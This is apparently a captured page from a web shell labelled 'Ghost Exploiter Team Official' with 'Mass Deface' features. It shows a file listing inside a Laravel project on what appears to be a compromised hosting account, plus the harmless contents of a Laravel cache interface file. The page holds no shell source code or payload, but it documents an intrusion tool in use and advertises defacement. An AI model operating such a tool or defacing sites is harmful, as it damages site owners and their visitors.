webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Contracts
/
Cache
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Factory.php
0.257KB
edt
ren
Lock.php
0.8KB
edt
ren
LockProvider.php
0.552KB
edt
ren
LockTimeoutException.php
0.115KB
edt
ren
Repository.php
2.833KB
edt
ren
Store.php
1.856KB
edt
ren
<?php namespace Illuminate\Contracts\Cache; interface Factory { /** * Get a cache store instance by name. * * @param string|null $name * @return \Illuminate\Contracts\Cache\Repository */ public function store($name = null); }